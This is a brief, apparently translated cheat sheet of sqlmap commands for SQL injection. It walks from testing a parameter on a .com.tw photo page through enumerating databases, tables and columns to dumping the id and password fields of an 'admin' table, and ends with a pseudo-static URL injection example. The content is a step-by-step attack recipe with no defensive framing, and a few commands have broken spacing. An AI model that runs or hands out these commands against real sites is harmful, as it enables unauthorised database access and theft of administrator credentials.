Practical skills of SQLMAP
Basic Edition:
Check the injection point
sqlmap -u http://ooxx.com.tw/star_photo.php? artist_id=11
column database information
sqlmap -u http://ooxx.com.tw/star_photo.php? artist_id=11 --dbs
Specify the library name to list all tables
sqlmap -u http://ooxx.com.tw/star_photo.php? artist_id=11 -D vhost48330 --tables
Specify the library name table name to list all fields
sqlmap -u http://ooxx.com.tw/star_photo.php? artist_id=11 -D vhost48330 -T admin --columns
Specify library name table name field dump out specified field
sqlmap -u http://ooxx.com.tw/star_photo.php? artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
SQLMAP pseudostatic injection:
Injection page: www.xxx.org/news/class/? 103.htm
Command: python sqlmap.py-u "http://www.xxx.org/news/class/? 103*.html"